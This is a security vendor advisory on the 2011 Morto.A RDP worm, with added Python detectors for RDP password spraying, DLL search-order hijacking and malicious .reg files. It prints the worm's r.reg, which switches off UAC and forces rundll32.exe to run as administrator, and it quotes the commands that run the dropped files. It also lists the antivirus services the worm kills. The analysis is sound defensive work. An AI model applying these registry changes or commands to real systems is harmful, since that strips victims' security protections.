RDP Worm Morto.A (Aug. 31, 2011)


The SonicWALL UTM Research team received reports of a new Internet worm propagating in the wild. The worm targets the Remote Desktop Protocol (RDP) and can download additional malicious components, terminate antivirus-related security processes and services, perform Denial-of-Service (DDoS) attacks, and be remotely controlled from a malicious server.

Process of Infection:

This worm spreads over Remote Desktop Protocol (RDP) by compromising weak administrator passwords. Once a system is infected, it scans the local network for RDP listeners on port 3389 and tries a built-in set of usernames and passwords to gain access to those machines and infect them.
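
A detection the propagation method above invites, as an added example that is not part of the original advisory: on a target, the worm's password guessing shows up as a burst of failed RDP logons from one source against several account names. The event lines are constructed in a simplified key=value form (assumed: Windows Security event 4625 with logon type 10 for RDP failures), and the window and thresholds are assumptions to tune.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon records. 10.0.0.99 cycles through
# administrator-style names the way the worm sprays its list at port 3389.
SAMPLE_EVENTS = """\
2011-08-31T10:00:01 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=10.0.0.99
2011-08-31T10:00:02 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=10.0.0.99
2011-08-31T10:00:02 EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=10.0.0.99
2011-08-31T10:00:03 EventID=4625 LogonType=10 TargetUserName=test IpAddress=10.0.0.99
2011-08-31T10:00:04 EventID=4625 LogonType=10 TargetUserName=user IpAddress=10.0.0.99
2011-08-31T10:00:05 EventID=4625 LogonType=10 TargetUserName=actuser IpAddress=10.0.0.99
2011-08-31T10:05:00 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=10.0.0.12
2011-08-31T10:09:00 EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=10.0.0.12
2011-08-31T11:00:00 EventID=4625 LogonType=3 TargetUserName=svc IpAddress=10.0.0.50
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)


def find_rdp_password_guessing(log_text, window=timedelta(minutes=1),
                               min_failures=5, min_users=3):
    """Return {source_ip: sorted account names tried} for every source that
    produced >= min_failures RDP logon failures against >= min_users distinct
    accounts inside one sliding time window."""
    failures = defaultdict(list)            # ip -> [(timestamp, user)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["id"] != "4625" or m["lt"] != "10":
            continue                        # only RDP logon failures count
        failures[m["ip"]].append((datetime.fromisoformat(m["ts"]), m["user"].lower()))

    flagged = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1                  # slide the window forward
            burst = events[start:end + 1]
            if len(burst) >= min_failures and len({u for _, u in burst}) >= min_users:
                flagged[ip] = sorted({u for _, u in events})
                break
    return flagged
```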

Installation:

This worm has three components: the main executable, the DLL loader, and the payload.

Main Executable

The main executable drops the DLL loader as ntshrui.dll in the %windir%\temp directory and copies it to %windir%\clb.dll.

It adds the following registry entries as part of its installation:

  • HKLM\SYSTEM\Wpa\it
  • HKLM\SYSTEM\Wpa\id
  • HKLM\SYSTEM\Wpa\ie
  • HKLM\SYSTEM\Wpa\sr
  • HKLM\SYSTEM\Wpa\sn
  • HKLM\SYSTEM\Wpa\md

It then deletes the following registry key to cover its tracks:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

The DLL loader clb.dll in the %windir% directory is loaded when the malware spawns Registry Editor (regedit.exe).

A legitimate clb.dll, the one regedit.exe actually uses, lives in the %windir%\system32 directory. But because of the Windows DLL search order, which checks the directory the executable lives in (%windir%, where regedit.exe is located) before %windir%\system32, the malicious clb.dll is loaded in place of the legitimate one.
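
An added example, not code from the advisory, of the search-order check this hijack suggests: list DLLs that sit in the executable's directory (%windir%) and also in %windir%\system32, since the first copy shadows the second. It builds a constructed stand-in tree in a temporary directory; check_real_host() applies the same check to the local %windir% on a Windows host (hits there still need manual review).

```python
import os
import tempfile


def find_shadowing_dlls(app_dir, system_dir):
    """Return names of DLLs present in app_dir that also exist in system_dir.
    Because the directory holding the executable (here %windir%, which holds
    regedit.exe) is searched before %windir%\\system32, each such duplicate in
    app_dir wins the load and shadows the real library."""
    system_dlls = {n.lower() for n in os.listdir(system_dir)
                   if n.lower().endswith(".dll")}
    return sorted(n for n in os.listdir(app_dir)
                  if n.lower().endswith(".dll") and n.lower() in system_dlls)


def check_real_host():
    """On Windows, audit %windir% against %windir%\\system32; elsewhere []."""
    windir = os.environ.get("WINDIR") or os.environ.get("SystemRoot")
    if not windir or not os.path.isdir(windir):
        return []
    return find_shadowing_dlls(windir, os.path.join(windir, "system32"))


def build_demo_tree():
    """Constructed stand-in for %windir% and %windir%\\system32 in a temp dir,
    with a clb.dll planted next to regedit.exe the way the worm does."""
    root = tempfile.mkdtemp()
    system32 = os.path.join(root, "system32")
    os.mkdir(system32)
    for name in ("clb.dll", "sens.dll"):                   # legitimate copies
        open(os.path.join(system32, name), "wb").close()
    open(os.path.join(root, "regedit.exe"), "wb").close()  # the host process
    open(os.path.join(root, "clb.dll"), "wb").close()      # planted loader
    return root, system32


if __name__ == "__main__":
    demo_root, demo_sys32 = build_demo_tree()
    print("shadowing DLLs:", find_shadowing_dlls(demo_root, demo_sys32))
```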

DLL Loader

Once loaded by regedit.exe, the DLL loader decrypts the payload DLL and loads it into memory. It also performs the following activities:

    Added Registry:

    Key: HKLM\SYSTEM\CurrentControlSet\Control\Windows
    Value: "NoPopUpsOnBoot"
    Data: "1"

    Key: HKLM\SYSTEM\CurrentControlSet\Services\6to4\Parameters
    Value: "ServiceDll"
    Data: "%windir%\temp\ntshrui.dll"

    Modified Registry:

    Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters
    Value: ServiceDll
    Data Before: %SystemRoot%\system32\sens.dll
    Data After: %SystemRoot%\system32\sens32.dll

    Added Files:

    %windir%\offline web pages\{Current Date}
    %windir%\offline web pages\1.40_testDdos
    %windir%\offline web pages\cache.txt – blocked as [ GAV: Morto.A_2 (Trojan) ]
    %windir%\system32\sens32.dll – blocked as [ GAV: Morto.A_2 (Trojan) ]

DLL Payload

The payload attempts to connect to RDP servers on the local network through port 3389 using administrator accounts. Some of the account names are shown in a screenshot (not reproduced in this text).

It copies the following files to the RDP workstation through the \\tsclient\a share, the client drive that RDP redirects into the session:

  • \\tsclient\a\a.dll – blocked as [ GAV: Morto.A_2 (Trojan) ]
  • \\tsclient\a\r.reg

The contents of r.reg are shown below. It sets EnableLUA and ConsentPromptBehaviorAdmin to 0, switching off User Account Control prompts, and gives every likely rundll32.exe path a RUNASADMIN compatibility layer, so rundll32.exe runs the malware with administrator privileges without prompting the user for permission for any system change:

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorAdmin"=dword:0
    "EnableLUA"=dword:0

    [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CuurrentVersion\AppCompatFlags\Layers]
    "c:\windows\system32\rundll32.exe"="RUNASADMIN"
    "d:\windows\system32\rundll32.exe"="RUNASADMIN"
    "e:\windows\system32\rundll32.exe"="RUNASADMIN"
    "f:\windows\system32\rundll32.exe"="RUNASADMIN"
    "g:\windows\system32\rundll32.exe"="RUNASADMIN"
    "h:\windows\system32\rundll32.exe"="RUNASADMIN"
    "i:\windows\system32\rundll32.exe"="RUNASADMIN"

    "c:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
    "d:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
    "e:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
    "f:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
    "g:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
    "h:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
    "i:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"

    "c:\winnt\system32\rundll32.exe"="RUNASADMIN"
    "c:\win2008\system32\rundll32.exe"="RUNASADMIN"
    "c:\win2k8\system32\rundll32.exe"="RUNASADMIN"
    "c:\win7\system32\rundll32.exe"="RUNASADMIN"
    "c:\windows7\system32\rundll32.exe"="RUNASADMIN"
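
An added example (not code from the advisory) that parses a .reg file in the format above and flags the two changes r.reg makes: UAC values set to 0, and a RUNASADMIN layer on any rundll32.exe path. The sample is a constructed excerpt modelled on the page's r.reg, with one harmless entry added to show what is not flagged.

```python
import re

# Constructed excerpt modelled on the r.reg the worm copies to \\tsclient\a.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"c:\windows\system32\rundll32.exe"="RUNASADMIN"
"c:\windows\SysWOW64\rundll32.exe"="RUNASADMIN"
"c:\tools\harmless.exe"="WINXPSP3"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(.+?)"=(?:dword:([0-9a-fA-F]+)|"(.*)")$')
UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin"}


def parse_reg(text):
    """Yield (key, value_name, data) for every value line in a .reg file;
    dword data is returned as int, string data as str."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        km = KEY_RE.match(line)
        if km:
            key = km.group(1)
            continue
        vm = VALUE_RE.match(line)
        if vm and key is not None:
            name, dword, string = vm.groups()
            yield key, name, int(dword, 16) if dword is not None else string


def audit_reg(text):
    """Flag UAC switched off and RUNASADMIN compatibility layers on rundll32.exe."""
    findings = []
    for key, name, data in parse_reg(text):
        if key.lower() == UAC_KEY.lower() and name.lower() in UAC_VALUES and data == 0:
            findings.append(f"UAC weakened: {name}=0")
        elif (key.lower().endswith(r"\appcompatflags\layers")
              and name.lower().endswith("rundll32.exe")
              and "RUNASADMIN" in str(data).upper()):
            findings.append(f"RUNASADMIN layer on {name}")
    return findings
```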

Once the files have been copied to an RDP workstation, the malware runs them with the following commands:

  • "regedit /s \\tsclient\a\r.reg"
  • "rundll32 \\tsclient\a\a.dll a"

It also terminates the following services, which belong to antivirus and security software:

  • 360rp
  • a2service
  • ACAAS
  • ArcaConfSV
  • AvastSvc
  • avguard
  • avgwdsvc
  • avp
  • avpmapp
  • ccSvcHst
  • cmdagent
  • coreService
  • FortiScand
  • FPAVServer
  • freshclam
  • fsdfwd
  • GDFwSvc
  • K7RTScan
  • knsdave
  • KVSrvXP
  • kxescore
  • mcshield
  • MPSvc
  • MsMpEng
  • NSESVC.EXE
  • PavFnSvr
  • RavMonD
  • SavService
  • scanwscs
  • Shell
  • SpySweeper
  • Vba32Ldr
  • vsserv
  • zhudongfangyu

Network Activities:

The malware tries to contact the following URLs:

  • qf{REMOVED}.net
  • ms.ji{REMOVED}nfo
  • ms.ji{REMOVED}o.cc
  • ms.ji{REMOVED}o.be

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Morto.A (Worm)
GAV: Morto.A_2 (Trojan)

